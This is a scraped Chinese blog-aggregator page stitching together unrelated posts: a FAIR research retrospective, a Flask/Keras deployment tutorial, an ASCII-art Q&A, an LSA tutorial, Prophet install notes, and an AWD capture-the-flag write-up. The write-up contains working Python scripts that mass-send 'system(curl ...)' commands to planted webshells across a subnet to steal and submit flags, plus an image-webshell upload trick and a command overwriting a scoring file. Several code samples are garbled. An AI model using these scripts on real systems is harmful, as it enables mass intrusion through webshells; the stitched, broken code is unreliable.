其他研究人员自那时起开始研究我们在 GAN 方面的工作，用它们来生成惊人的高分辨率图像。但 GAN 是出了名的难调，并且经常收敛失败。所以 FAIR 通过在理论层面理解对抗训练，探索了一些增加 GAN 可靠度的方法。2017 年，我们提出了 Wasserstein GAN （WGAN）方法，该方法使得判别器更加「平滑」、高效，以便告诉生成器如何改进其预测。WGAN 基本上是第一个在大量应用中收敛鲁棒的 GAN。这避免了在系统优化时需要平衡判别器和生成器的输出，进而导致学习稳定性显著提高，特别是对于高分辨率图像生成任务而言。

自此，FAIR 研究人员和 Facebook 工程师开始在一系列应用中使用对抗训练方法，包括长期视频预测和时装作品的创作。但 GAN 真正有趣的部分是其对于未来的意义。作为一种在几年前我们还无法使用的全新技术，它为我们在缺乏数据的领域生成数据创造了新的机会。它可能是我们构建自主学习机器的关键工具。

大规模文本分类

文本理解不是单一任务，而是多个子任务的复杂矩阵，如将语言的单词、短语和整个数据集转换成机器可以处理的格式。但是在做这些工作之前，文本本身也需要分类。很多年前，word2vec 等 NLP 模型通过大量基于词的训练对文本进行分类，模型为训练数据集中的每个词分配不同的向量。对于 Facebook 来说，那些方法太慢了，而且太依赖全监督数据。我们需要对数百甚至数千种语言执行文本分类，其中很多语言并不具备大量数据集。文本分类系统需要扩展到所有基于文本的功能和服务，以及我们的 NLP 研究。

因此，2016 年 FAIR 构建了 fastText ，这是一个快速文本分类框架，学习词表征的同时还可以考虑单词的形态。在 2017 年发表的论文《Enriching Word Vectors with Subword Information》中，FAIR 提出了一个将向量分配给「子词单元」（subword unit）而不是整个单词的模型，使系统为未出现在训练数据中的单词创建表征。最终该模型可以扩展到数十亿单词，能够从新的、未训练单词中学习，且训练速度显著快于典型的深度学习分类器。在一些情况下，之前的模型需要数天的训练时间，而 fastText 只需要几秒。

fastText 被证明是对基于 AI 的语言理解的重大贡献，现在可用于 157 种语言。原始论文的被引用次数已超一千，fastText 仍是词嵌入系统最常用的基线。在 Facebook 以外，fastText 也被广泛用于大量应用，从我们熟悉的信息回复建议到陌生的「算法剧院」产品 THE GREAT OUTDOORS，它使用 fastText 帮助选择和排序公开网络评论，然后将它们作为每次表演的台词。fastText 框架已经在 Facebook 中部署，对 19 种语言进行文本分类，它还被用于 DeepText 中，执行翻译和自然语言理解。

前沿翻译研究

快速、准确、灵活的翻译是帮助世界各地的人们实现良好沟通的重要因素。因此，FAIR 在早期就开始寻找优于统计机器翻译的新方法，统计机器翻译在当时是最优秀的方法。我们用了三年时间构建出基于 CNN 的神经机器翻译架构，该架构完美结合了速度、准确率和学习。实验表明该方法比当时最优的 RNN 速度快 9 倍。

我们的多跳 CNN（multi-hop CNN）不仅更容易在较小的数据集上训练，还能更好地理解拼写错误的单词或缩写词，如将「tmrw」（tomorrow 的缩写）翻译成「maana」（西班牙语，表示将来某时）。整体上，这种 NMT 方法将翻译准确率提升了 11%，翻译交付的速度提升了 2.5 倍。除了改进我们自己的系统以外，我们还开源了 fairseq 的代码和模型。

为了避免机器翻译对大量训练数据集（通常叫作语料库）的需求，我们还探索了其它方法，如多语言嵌入，它可以在多语言之间进行训练。去年，我们开源了 MUSE，这是一个学习多语言词嵌入的 python 库，提供两种学习方法：监督学习，使用发布版本中包含的 110 个双语词典；无监督学习，在没有平行语料库的情况下在两种语言之间构建新的双语词典。我们紧接着进行了无监督机器翻译的研究，论文《Phrase-Based & Neural Unsupervised Machine Translation》获得了 EMNLP 最佳长论文奖，该研究展示了无监督训练对完整句子翻译的显著提升。

两种语言中的二维词嵌入（左、中）可以通过简单旋转完成对齐（右）。旋转后，词翻译可以通过最近邻搜索来执行。

通过分享研究和资源（如 fairseq 和 MUSE），我们鼓励大家利用更快、更准确、更通用的翻译技术，不管是出于研究目的还是用于生产性应用。

惠及每个人的 AI 工具 AI 进展不仅依赖于突破性的想法，还依赖于强大的平台和测试实现工具。FAIR 优先构建这些系统，并与世界共享成果。2015 年，我们开源了大量 Torch 深度学习模块，它们由 FAIR 创建，旨在加速大型神经网络的训练速度。2016 年，我们发布了 Torchnet ，以使社区更简单快速地构建高效、可重用的学习系统。之后不久，我们开源了 Caffe2 ，目前这一适用于移动计算的模块化深度学习框架在全世界范围内超过 10 亿台手机上运行神经网络。然后我们与微软和亚马逊合作发布了神经网络

↧

将深度学习模型部署为web应用有多难？答案自己找

December 7, 2018, 10:14 pm

≫ Next: Vertically display ASCII art with Python

≪ Previous: FAIR 这五年！

本文将教你如何把训练好的 Keras深度学习模型部署为 web 应用程序。虽然这涉及很多技术，但你真的不要试试吗？

虽然创建一个机器学习项目很酷，但你最终往往还是希望其他人能够看到自己的成果。当然，你可以将整个项目放在 GitHub 上，但是，你的祖父母估计很难看明白。因此，我们想要做的是，将深度学习模型部署成一个任何人都可以访问的 web 应用程序。

在本文中，你将了解如何编写 web 应用程序，该程序采用训练好的 Keras 循环神经网络并允许用户生成新的专利摘要。本文的项目是基于以下示例文章中的循环神经网络研究，但我们没有必要弄清楚如何创建此类循环神经网络。现在我们只需将其当成黑箱模型：输入开始序列，它会输出全新的专利摘要，而我们可以在浏览器中显示出来!

示例地址：https://medium.com/p/ffd204f99470?source=user_profile---------6------------------

传统来说，一般由数据科学家负责开发模型，而前端工程师负责把模型向外界展示。在本项目中，我们将同时扮演这两个角色，并深入解读 web 应用的开发过程（尽管几乎都是用 python 编写的）。

本项目将涉及以下多个主题：

Flask：在 Python 环境下创建一个基础的 web 应用

Keras：部署一个训练好的循环神经网络模型

使用 Jinja 模板库创建模板

使用 HTML 和 CCS 编写 web 网页

最终我们将得到一个 web 应用程序，它允许用户使用训练好的循环神经网络生成全新的专利摘要：

完整项目代码可以通过以下地址获得：

https://github.com/WillKoehrsen/recurrent-neural-networks

方法

本项目旨在快速创建并运行一个 web 应用程序。为此，我选择了 Flask 框架，它允许我们用 Python 编写应用程序。我不喜欢杂乱的应用样式，所以几乎所有的 CSS 都是复制粘贴过来的。以下两篇文章对了解这方面的基础知识比较有用，还能提供不错的指南：

https://towardsdatascience.com/deploying-keras-deep- learningmodel -with-flask-5da4181436a2

https://towardsdatascience.com/deploying-keras-deep-learning-models-with-flask-5da4181436a2

总的来说，这个项目遵循了我的设计原则：快速地建立并运行一个原型――尽量选择复制和粘贴――然后通过不断迭代做出更好的产品。

使用 Flask 实现一个基础的 web 应用

在 Python 环境下构建一个 web 应用，最快捷的方式就是使用 Flask。我们可以通过以下方式来制作自己的 web 应用程序：

from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "<h1>Not Much Going On Here</h1>"
app.run(host='0.0.0.0', port=50000)

如果你复制粘贴此代码并运行它，你可以在浏览器中输入地址：localhost:50000 来查看自己的 web 应用程序。当然，我们当然还想在 web 应用中做更多的事，所以我们将使用一个稍微复杂一点的函数，它的基本功能是一样的：处理来自浏览器的请求并以 HTML 的形式提供一些内容。在主页中，我们会向用户提供一个表单让他们可以输入一些详细信息。

用户输入的表单

当用户打开应用程序主页后，我们将向他们展示一个带有 3 个可选参数的表单：

输入 RNN 的起始序列或由服务器随机选择一个序列

选择 RNN 预测的多样性

选择 RNN 输出的单词数

我们将使用「wtforms」在 Python 环境下建立一个表单。构建表单的代码如下：

from wtforms import (Form, TextField, validators, SubmitField,
DecimalField, IntegerField)
class ReusableForm(Form):
"""User entry form for entering specifics for generation"""
# Starting seed
seed = TextField("Enter a seed string or 'random':", validators=[
validators.InputRequired()])
# Diversity of predictions
diversity = DecimalField('Enter diversity:', default=0.8,
validators=[validators.InputRequired(),
validators.NumberRange(min=0.5, max=5.0,
message='Diversity must be between 0.5 and 5.')])
# Number of words
words = IntegerField('Enter number of words to generate:',
default=50, validators=[validators.InputRequired(),
validators.NumberRange(min=10, max=100,
message='Number of words must be between 10 and 100')])
# Submit button
submit = SubmitField("Enter")

这将创建下图所示的表单（采用了「main.css」的样式）：

代码中的「validator」确保用户输入了正确的信息。例如，我们会检查所有的复选框是否都已填充，并且检查「diversity」的值是否介于 0.5 到 5 之间。只有满足这些要求的表单才能被接受。

验证错误

我们实际上是通过 Flask 模板提供这些表单的。

模板

模板是一个带有基本框架的文档，我们需要填充其中的一些细节。对于 Flask web 应用程序，我们可以使用 Jinja 模板库将 Python 代码嵌入到 HTML 文档中。例如，在主函数中，我们将把表单的内容发送到一个名为「index.html」的模板中。

from flask import render_template
# Home page
@app.route("/", methods=['GET', 'POST'])
def home():
"""Home page of app with form"""
# Create form
form = ReusableForm(request.form)
# Send template information to index.html
return render_template('index.html', form=form)

当用户打开主页时，我们的应用程序将使用「form」表单中的详细信息开启一个基于「index.html」模板的页面。这个模板是一个简单的 html 脚手架，在这里我们使用 {{variable}} 语法引用 python 变量。

<!DOCTYPE html> <html> <head> <title>RNN Patent Writing</title> <link rel="stylesheet" href="/static/css/main.css"> <link rel="shortcut icon" href="/static/images/lstm.ico"> </head> <body> <div class="container"> <h1> <center>Writing Novel Patent Abstracts with Recurrent Neural Networks</center> </h1> {% block content %} {% for message in form.seed.errors %} <div class="flash">{{ message }}</div> {% endfor %} {% for message in form.diversity.errors %} <div class="flash">{{ message }}</div> {% endfor %} {% for message in form.words.errors %} <div class="flash">{{ message }}</div> {% endfor %} <form method=post> {{ form.seed.label }} {{ form.seed }} {{ form.diversity.label }} {{ form.diversity }} {{ form.words.label }} {{ form.words }} {{ form.submit }} </form> {% endblock %} </div> </body> </html>

表单中的每个错误（那些无法通过验证的条目）将会触发一个错误信息「flash」。如果没有错误，此文件将显示如上所示的表单。

当用户输入信息并点击提交表单（POST 请求）时，如果信息是正确的，我们会将输入传递给适当的函数并用训练好的 RNN 进行预测。这意味着我们需要修改「home()」方法。

from flask import request
# User defined utility functions
from utils import generate_random_start, generate_from_seed
# Home page
@app.route("/", methods=['GET', 'POST'])
def home():
"""Home page of app with form"""
# Create form
form = ReusableForm(request.form)
# On form entry and all conditions met
if request.method == 'POST' and form.validate():
# Extract information
seed = request.form['seed']
diversity = float(request.form['diversity'])
words = int(request.form['words'])
# Generate a random sequence
if seed == 'random':
return render_template('random.html',
input=generate_random_start(model=model,
graph=graph,
new_words=words,
diversity=diversity))
# Generate starting from a seed sequence
else:
return render_template('seeded.html',
input=generate_from_seed(model=model,
graph=graph,
seed=seed,
new_words=words,
diversity=diversity))
# Send template information to index.html
return render_template('index.html', form=form)

现在，当用户单击提交按钮「submit」且信息正确时，web 将根据第一个文本框中的输入信息选择将输入的表单发送到「generate_random_start」或「generate_from_seed」。这些函数使用训练好的 Keras 模型生成符合用户指定的多样性和单词数的新专利摘要。这些函数的输出会被依次传给模板「random.html」或「seeded.html」来启动新的 web 页面。

使用预训练的 Keras 模型做预测

参数「model」将指定使用哪个训练好的 Keras 模型，代码如下：

from keras.models import load_model
import tensorflow as tf
def load_keras_model():
"""Load in the pre-trained model"""
global model
model = load_model('../models/train-embeddings-rnn.h5')
# Required for model to work
global graph
graph = tf.get_default_graph()
load_keras_model()

（「tf.get_default_graph()」是基于下面的 github gist 采取的一种解决方案：https://gist.github.com/eyesonlyhack/2f0b20f1e73aaf5e9b83f49415f3601a

在这里，我们不会完整地展示这两个「util」函数，你要知道的是，它们使用训练好的 Keras 模型以及相应的参数，并对一个新的专利摘要进行预测。

完整代码见：https://github.com/willkoehrsen/recurent -neural-networks/blob/master/deployment/utils.py

这些函数都返回带有格式化的 HTML 的 Python 字符串。该字符串将被传递给另一个模板，作为 web 页面呈现出来。例如，「generate_random_start」返回的格式化的 html 会带用户跳转到 random.html：

<!DOCTYPE html> <html> <header> <title>Random Starting Abstract </title> <link rel="stylesheet" href="/static/css/main.css"> <link rel="shortcut icon" href="/static/images/lstm.ico"> <ul> <li><a href="/">Home</a></li> </ul> </header> <body> <div class="container"> {% block content %} {{input|safe}} {% endblock %} </div> </body> </html>

在这里，我们再次使用 Jinja 模板引擎来显示格式化的 HTML。由于 Python 字符串已经被格式化为 HTML，我们所要做的就是使用 {{input|safe}}（其中 input 是 Python 变量）来显示它。接着，我们就可以使用「main.css」对这个页面进行样式化了，使用方法就像使用其它 html 模板一样。

输出

「generate_random_start」函数将会选择一个随机的专利摘要作为起始的输入序列，并且根据它做出预测。接着，它会显示出这个起始的输入序列。循环神经网络会产生输出，真实的输出结果如下：

使用随机初始序列得到的输出。

「generate_from_seed」函数使用用户提供的初始序列，然后会使用训练好的循环神经网络作出预测、构建输出。输出的结果如下：

使用指定的初始序列得到的输出。

虽然结果并不总是完全正确，但它们确实表明循环神经网络已经掌握了英语基础。模型经过训练学会了根据前 50 个单词来预测下一个单词，并学会了如何写出一个还不错的专利摘要！根据预测的多样性「diversity」，输出可能完全是随机的或循环的。

运行应用程序

你只需下载代码仓库，转向「deployment」目录并输入「python run_keras_server.py」就可以运行该应用程序了。你可以立刻在地址 localhost:10000 上使用这个 web 应用程序。

你可以根据家庭 WiFi 的配置情况，使用你的 IP 地址从网络上的任何计算机访问该应用程序。

下一步的工作

在个人电脑上运行的 web 应用程序非常适合与朋友和家人共享。不过，我不建议在你的家庭网络中向所有人开放这个网站！为此，我们将在AWSEC2 实例上装载该应用程序，并将其开放（稍后将提供）。

如果你想要改进这个应用程序，可以改变样式（通过 main.css），也许还可以添加更多选项，比如可以选择预训练好的网络。制作个人项目的好处是，你可以随心所欲地去做你想做的事。如果你想试着玩一玩这个应用程序，你可以通过下面的链接下载代码，然后开始你的实验。

链接：https://github.com/willkoehrsen/recursive - neur- networks

结语

在本文中，我们看到了如何将训练好的 Keras深度学习模型部署为 web 应用程序。这需要将许多不同的技术组合在一起，包括循环神经网络、web 应用程序、模板、HTML、CSS，当然还有 Python。

虽然这只是一个基础的应用程序，但它表明你可以在付出相对较少努力的情况下使用深度学习来构建 web 应用程序。目前，还没有多少人敢说他们能将一个深度学习部署为一个 web 应用，如果你遵照这本文的方法进行实验，那你就能成为少数掌握这项技能的开发者之一啦！

原文链接：https://towardsdatascience.com/deploying-a-keras-deep-learning-model-as-a-web-application-in-p-fc0f2354a7ff

↧

Vertically display ASCII art with Python

December 7, 2018, 10:12 pm

≫ Next: 教你在Python中实现潜在语义分析

≪ Previous: 将深度学习模型部署为web应用有多难？答案自己找

for another code that I am working on, I need to vertically flip an ASCII image: I want to make this:

* *** ***** *** ***

into this:

*** *** ***** *** *

All I have right now is to read input on multiple lines into an array, but how do I make it so that it prints the first array last and the bottom array first.

text = "" stopword = "" while True: line = input() if line.strip() == stopword: break You can add each line to a list of lines ( list.append ) and then invert that list ( list[::-1] ) before printing: lines = [] stopword = "" while True: line = input() if line.strip() == stopword: break lines.append(line) # Add to the list of lines for line in lines[::-1]: # [::-1] inverts the list print(line)

↧

教你在Python中实现潜在语义分析

December 7, 2018, 10:10 pm

≫ Next: 湖湘杯线下AWD记录

≪ Previous: Vertically display ASCII art with Python

介绍

你有没有去过那种运营良好的图书馆？我总是对图书馆馆员通过书名、内容或其他主题保持一切井井有条的方式印象深刻。但是如果你给他们数千本书，要求他们根据书的种类整理出来，他们很难在一天内完成这项任务，更不用说一小时！

但是，如果这些书以电子的形式出现，就难不倒你了，对吧？所有的整理会在几秒之间完成，并且不需要任何人工劳动。自然语言处理（NLP）万岁！

看看下面这段话：

你可以从高亮的词语中总结出，这段话有三个主题（或概念）――主题1、主题2和主题3。一个良好的主题模型可以识别出相似的词语并将它们放在一组或一个主题下。上述示例中最主要的主题是主题2，表明这段文字主要关于虚假视频。

是不是很好奇？太好了！在本文中，我们将学习一种叫做主题建模的文本挖掘方法。这是一种非常有用的提取主题的技术，在面对NLP挑战时你会经常使用到它。

注意：我强烈建议您通读这篇文章了解SVD和UMAP等定义。它们在本文中经常出现，因此对它们有基本的理解有助于巩固这些概念。

1.什么是主题模型？

2.何时使用主题建模？

3.潜在语义分析（LSA）概述

4.在python中实现LSA

数据读取和检查

数据预处理

文档-词项矩阵（Document-Term Matrix）

主题建模

主题可视化

5. LSA的优缺点

6. 其他主题建模技术

什么是主题模型？

主题模型可定义为一种在大量文档中发现其主题的无监督技术。这些主题本质上十分抽象，即彼此相关联的词语构成一个主题。同样，在单个文档中可以有多个主题。我们暂时将主题模型理解为一个如下图所示的黑盒子：

这个黑盒子（主题模型）将相似和相关的词语聚集成簇，称为主题。这些主题在文档中具有特定的分布，每个主题都根据它包含的不同单词的比例来定义。

何时使用主题建模？

回想一下刚才提到的将相似的书籍整理到一起的例子。现在假设你要对一些电子文档执行类似的任务。只要文档的数量不太多，你就可以手动完成。但是如果这些文档的数量非常多呢？

这就是NLP技术脱颖而出的地方。对于这个任务而言，主题建模非常适用。

主题建模有助于挖掘海量文本数据，查找词簇，文本之间的相似度以及发现抽象主题。如果这些理由还不够引人注目，主题建模也可用于搜索引擎，判断搜索字段与结果的匹配程度。越来越有趣了，是不是？那么，请继续阅读！

潜在语义分析（LSA）概述

所有语言都有自己的错综复杂和细微差别，比如一义多词和一词多义，这对机器而言很难捕捉（有时它们甚至也被人类误解了！）。

例如，如下两个句子：

1.I liked his last novel quite a lot.

2.Wewould like to go for a novelmarketing campaign.

在第一个句子中，'novel' 指一本书，而在第二个句子中，它的含义是新奇的、新颖的。

我们能够轻松地区分这些单词，是因为我们可以理解这些词背后的语境。但是，机器并不能捕捉到这个概念，因为它不能理解单词的上下文。这就是潜在语义分析（LSA）发挥作用的地方，它可以利用单词所在的上下文来捕捉隐藏的概念，即主题。

因此，简单地将单词映射到文档并没有什么用。我们真正需要的是弄清楚单词背后的隐藏概念或主题。LSA是一种可以发现这些隐藏主题的技术。现在我们来深入探讨下LSA的内部工作机制。

LSA的实施步骤

假设我们有m篇文档，其中包含n个唯一词项（单词）。我们希望从所有文档的文本数据中提取出k个主题。主题数k，必须由用户给定。

生成一个m×n维的文档-词项矩阵（Document-Term Matrix），矩阵元素为TF-IDF分数

然后，我们使用奇异值分解（SVD）把上述矩阵的维度降到k（预期的主题数）维

SVD将一个矩阵分解为三个矩阵。假设我们利用SVD分解矩阵A，我们会得到矩阵U，矩阵S和矩阵VT（矩阵V的转置）

矩阵Uk（document-term matrix）的每个行向量代表相应的文档。这些向量的长度是k，是预期的主题数。代表数据中词项的向量可以在矩阵Vk（term-topic matrix）中找到。

因此，SVD为数据中的每篇文档和每个词项都提供了向量。每个向量的长度均为k。我们可以使用余弦相似度的方法通过这些向量找到相似的单词和文档。

在Python中实现LSA

是时候启动Python并了解如何在主题建模问题中应用LSA了。开启Python环境后，请按照如下步骤操作。

数据读取和检查

在开始之前，先加载需要的库。

import numpy as np

import pandas as pd import matplotlib.pyplot as plt import seaborn as sns pd.set_option("display.max_colwidth", 200)

在本文中，我们使用sklearn中的"20 Newsgroup"数据集，可从这里下载，然后按照代码继续操作。

from sklearn.datasets import fetch_20newsgroups

dataset = fetch_20newsgroups(shuffle=True, random_state=1, remove=('header','footers',quotes')) documents = dataset.data len(documents)

Output: 11,314

Dataset.target_names

['alt.atheism', 'comp.graphics', 'comp.os.ms-windows.misc', 'comp.sys.ibm.pc.hardware', 'comp.sys.mac.hardware', 'misc.forsale', 'rec.autos', 'rec.motorcycles', 'rec.sport.baseball', 'rec.sport.hockey', 'sci.crypt', 'sci.electronics', 'sci.med', 'sci.space', 'soc.religion.christian', 'talk.politics.guns', 'talk.politics.mideast', 'talk.politics.misc', 'talk.religion.misc']

该数据集包含分布在20个不同新闻组中的11314篇文档。

数据预处理首先，我们尝试尽可能地清理文本数据。我们的想法是，使用正则表达式replace("[^a-zA-Z#]", " ")一次性删除所有标点符号、数字和特殊字符，这个正则表达式可以替换除带空格的字母之外的所有内容。然后删除较短的单词，因为它们通常并不包含有用的信息。最后，将全部文本变为小写，使得大小写敏感失效。

news_df = pd.DataFrame({'document':documents})

#removing everything except alphabets news_df['clean_doc'] = news_df['document'].str.replace("[^a-zA-Z#]", " ") # removing short words news_df['clean_doc'] = news_df['clean_doc'].apply(lambda x: ' '.join([w for w in x.split() if len(w)>3])) #make all the lowercase news_df['clean_doc'] = news_df['clean_doc'].apply(lambda x: x.lower())

最好将文本数据中的停止词删除，因为它们十分混乱，几乎不携带任何信息。停止词是指'it', 'they', 'am', 'been', 'about', 'because', 'while'之类的词汇。

要从文档中删除停止词，我们必须对文本进行标记，将文本中的字符串拆分为单个的标记或单词。删除完停止词后，我们将标记重新拼接到一起。

from nltk.corpus import stopwords

stop_words = stopwords.words('english') # tokenization tokenized_doc = news_df['clean_doc'].apply(lambda x: x.split()) # remove stop-words tokenized_doc = tokenized_doc.apply(lambda x: [item for item in x ifitem not in stop_words]) #de-tokenization detokenized_doc = [] for i in range(len(news_df)): t = ' '.join(tokenized_doc[i]) detokenized_doc.append(t) news_df['clean_doc'] = detokenized_doc 文档-词项矩阵（Document-Term Matrix）

这是主体建模的第一步。我们将使用sklearn的TfidfVectorizer来创建一个包含1000个词项的文档-词项矩阵。

from sklearn.feature_extraction.text import TfidfVectorizer

vectorizer = TfidfVectorizer(stop_words='english', max_features =1000, # keep top 1000 terms max_df = 0.5, smooth_idf = True) X= vectorizer.fit_transform(news_df['clean_doc']) X.shape # check shape of the document-term matrix (11314, 1000)

我们也可以使用全部词项来创建这个矩阵，但这回需要相当长的计算时间，并占用很多资源。因此，我们将特征的数量限制为1000。如果你有计算能力，建议尝试使用所有词项。

主题建模

下一步是将每个词项和文本表示为向量。我们将使用文本-词项矩阵，并将其分解为多个矩阵。我们将使用sklearn的TruncatedSVD来执行矩阵分解任务。

由于数据来自20个不同的新闻组，所以我们打算从文本数据中提取出20个主题。可以使用n_components参数来制定主题数量。

from sklearn.decomposition import TruncatedSVD

#SVD represent documents and terms in vectors svd_model = TruncatedSVD(n_components=20, algorithm='randomized', n_iter=100, random_state=122) svd_model.fit(X) len(svd_model.components_)

svd_model的组成部分即是我们的主题，我们可以通过svd_model.components_来访问它们。最后，我们打印出20个主题中前几个最重要的单词，看看我们的模型都做了什么。

terms = vectorizer.get_feature_names()

for i, comp in enumerate(svd_model.components_): terms_comp = zip(terms, comp) sorted_terms = sorted(terms_comp, key=lambda x:x[1], reverse=True)[:7] print("Topic "+str(i)+": ") for t in sorted_terms: print(t[0]) print(" ") Topic 0: like know people think good time thanks Topic 0: like know people think good time thanks Topic 1: thanks windows card drive mail file advance Topic 2: game team year games season players good Topic 3: drive scsi disk hard card drives problem Topic 4: windows file window files program using problem Topic 5: government chip mail space information encryption data Topic 6: like bike know chip sounds looks look Topic 7: card sale video offer monitor price jesus Topic 8: know card chip video government people clipper Topic 9: good know time bike jesus problem work Topic 10: think chip good thanks clipper need encryption Topic 11: thanks right problem good bike time window Topic 12: good people windows know file sale files Topic 13: space think know nasa problem year israel Topic 14: space good card people time nasa thanks Topic 15: people problem window time game want bike Topic 16: time bike right windows file need really Topic 17: time problem file think israel long mail Topic 18: file need card files problem right good Topic 19: pr

↧

湖湘杯线下AWD记录

December 8, 2018, 12:20 am

≫ Next: 使用Prophet进行时间序列预测

≪ Previous: 教你在Python中实现潜在语义分析

发现一个 .shell.php菜刀马，密码c ，但是是root权限创建，并且有定时任务一直写入，无法删除，可以选择写一个 while循环删除他。然后根据.shell.php去批量拿flag。

#coding=utf-8
import requests
import re
from gevent import pool
from gevent import monkey
from gevent import lock
monkey.patch_all()
port="80"
payload = {"c": 'system('curl http://172.16.0.225:8000/flag');'}
heads = {"cookie":"PHPSESSID=censulo0283idutu58ap6lvem7; xdgame_username=hacker"}
def f(flag):
data = {"key": flag}
try:
req =requests.post("http://172.16.0.225/index.php/wargame/submit", data=data, headers=heads, timeout=2)
title = re.findall('<title>(.*?)</title>', req.text, re.S)
return title
except Exception as e:
pass
webshelllist=open("webshelllist.txt","w")
flag = open("firstround_flag.txt","w")
def get_(ip):
url = "http://%s/.shell.php" % ip
try:
res = requests.post(url, payload, timeout=2)
print ip, f(str(res.text)), res.text,"bbb"
except Exception as e:
pass
def get_1(ip):
url = "http://%s/.config.php" % ip
payloads = {"cmd": 'system('curl http://172.16.0.225:8000/flag');'}
try:
res = requests.post(url, payloads, timeout=2)
if res.text:
print ip, f(str(res.text)), "aaa"
except Exception as e:
pass
pl = pool.Pool(254)
ipl = ["172.16.0.%s" % x for x in range(0, 254)]
pl.map(get_, ipl)
pl.join()
webshelllist.close()
flag.close()

脚本丢给队友去执行，继续审计代码，通过搜索eval关键字，成功又找到一枚后门

然后编写代码，继续批量拿flag，很多选手可能到后面才知道，ip段是 172.16.0.0/24 和 172.16.0.1/24

import requests
import re
from gevent import pool
from gevent import monkey
monkey.patch_all()
heads = {"cookie":"PHPSESSID=censulo0283idutu58ap6lvem7; xdgame_username=hacker",
"User-Agent": "hacker"}
proxy = {"http": "http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}
def f(flag):
data = {"key": flag}
try:
req =requests.post("http://172.16.0.225/index.php/wargame/submit", data=data, headers=heads, timeout=2)
title = re.findall('<title>(.*?)</title>', req.text, re.S)
return title
except Exception as e:
f(flag)
def get_(ip):
url = "http://%s/3/gcount/styles/.web2/?a=system('curl http://172.16.0.225:8000/flag');" % ip
try:
res = requests.post(url, timeout=2)
print res.status_code
if res.status_code == 200:
print ip, f(str(res.text.strip())), res.text, "bbb"
except Exception as e:
pass
pl = pool.Pool(100)
ipl = ["172.16.0.%s" % x for x in range(0, 254)]
#ipl = ["172.16.1.%s" % x for x in range(0, 254)]
pl.map(get_, ipl)
pl.join()

根据这个后门在最后一个小时里面，狂刷分到结束从第十一刷到第二。后面爆破了一下mysql，发现很多队伍都没有修改mysql的密码。

第一场 AWD 结束。

下午场

还是头一次参加这种比赛，赛制为在Web目录下的HIll/SCORE_POINTS的文件中写入你队伍的token，服务器每半个小时重置一次，每5分钟check一次，check时写入的成功队伍则得分。

web1.humensec.com
web2.humensec.com
web3.humensec.com
web4.humensec.com
web5.humensec.com
pwn1.humensec.com
pwn2.humensec.com
pwn3.humensec.com

刚刚开始一个个去测试漏洞，但是前面两个小时我们队伍题目都很难打开，只能扫选手的80端口玩玩，见到了搭建了乌云知识库的、搭建ctf笔记的、各种DVWA的。。。

“”” 省略一个小时 “””

后面发现web站都存在目录遍历，upload目录有别人的上传痕迹，刷新等webshell，然后爆破别人的webshell,成功拿下了web1.humensec.com，果断先扒下源码，简单审计一下：

知道别人是通过任意文件上传拿下的webshell，直接在源码里面搜索upload

代码：

<?php
/* Note: This thumbnail creation script requires the GD PHP Extension.
If GD is not installed correctly PHP does not render this page correctly
and SWFUpload will get "stuck" never calling uploadSuccess or uploadError
*/
// Get the session Id passed from SWFUpload. We have to do this to work-around the Flash Player Cookie Bug
@set_time_limit(0);
@error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);
ini_set('html_errors', '0');
define('SYSTEM_ROOT', str_replace("\", '/',substr(dirname(__FILE__),0,-10)));
include SYSTEM_ROOT.'include/common.inc.php';
if (isset($_POST["PHPSESSID"])) {
session_id($_POST["PHPSESSID"]);
}
session_start();
ini_set("html_errors", "0");
// Check the upload
if (!isset($_FILES["Filedata"]) || !is_uploaded_file($_FILES["Filedata"]["tmp_name"]) || $_FILES["Filedata"]["error"] != 0) {
echo "err-1";
exit(0);
}
if (!is_array(@getimagesize($_FILES["Filedata"]["tmp_name"])))
{
echo "err-2";
exit(0);
}
if (!isset($_SESSION["file_info"])) {
$_SESSION["file_info"] = array();
}
$fileName = $_userid.'_'.time().mt_rand(10000,99999).'.'.strtolower(get_fileext($_FILES["Filedata"]["name"]));
$path=date('Y-m-d',time()).'/';
@mkdir(SYSTEM_ROOT.'upload/image/'.$path);
move_uploaded_file($_FILES["Filedata"]["tmp_name"], "../../upload/image/".$path. $fileName);
// 加水印
setwatermark(SYSTEM_ROOT.'upload/image/'.$path.$fileName);
echo "FILEID:" . $path.$fileName;
exit(0);
?>

只需要上传一个合成后的图片马，copy 1.jpg/b + 1.php new.jpg , 即可shell然后后面就是一直在刷新修改SCORE_POINTS文件。。。（北京梆梆和安恒一直和我们抢，抢的都没有我们的分多 hahahaha）

?ccc=system(‘echo “队伍名“>/var/www/Hill/SCORE_POINTS’);

tips:用IE6刷新速度贼快然后从 0 分，到最后一直刷新到了第四名。第二场 netkoth 结束

↧

使用Prophet进行时间序列预测

December 8, 2018, 12:18 am

≫ Next: gamingdirectional: Create the about scene for pygame project

≪ Previous: 湖湘杯线下AWD记录

Prophet 是Facebook开源的预测工具，相比ARIMA模型，Prophet真的是非常的简单。只要读入两列数据即可完成预测。且在某些环境下预测的准确性不输ARIMA。Prophet提供了R语言版本和python版本，这里主要讲解的是Python版本。更多信息可产看官方链接。

Prophet的安装

fbprophet为Prophet在Python环境下的包，想要使用fbprohhet并没有想象中的那么简单，特别是在windows系统上可能发生错误。主要原因是fbprophet基于pystan，pystan基于cython。问题会卡在pystan的安装上。

即正确的安装流程为：

pip install cython pip install pystan pip install fbprophet

在安装pystan时会报如下错误： WARNING : pystan : MSVC compiler is not supported 。具体原因可在官方说明中找到：

PyStan is partially supported under Windows with the following caveats: Python 2.7: Doesn’t support parallel sampling. When drawing samples n_jobs=1 must be used) Python 3.5 or higher: Parallel sampling is supported MSVC compiler is not supported. PyStan requires a working C++ compiler. Configuring such a compiler is typically the most challenging step in getting PyStan running. PyStan is tested against the MingW-w64 compiler which works on both Python versions (2.7, 3.x) and supports x86 and x64. Due to problems with MSVC template deduction, functions with Eigen library are failing. Until this and other bugs are fixed no support is provided for Windows + MSVC. Currently, no fix is known for this problem, other than to change the compiler to GCC or clang-cl.

解决方案为：将Python编译环境更改为MingW-w64。

下载MingW-w64，并进行安装，下载地址： https://osdn.net/projects/mingw/releases/ 将mingw的路径添加到环境变量的PATH中，示例路径：C:\mingw-w64\x86_64-7.1.0-posix-seh-rt_v5-rev0\mingw64\bin 验证编译环境是否OK，验证方式为在cmd中执行如下命名 gcc dumpversion、ld v、dllwrap version 修改Python内部编译设置，方法为在Python安装目录下（示例：C:\Python36\Lib\distutils），新建cfg文件，文件内容为 [build] compiler = mingw32

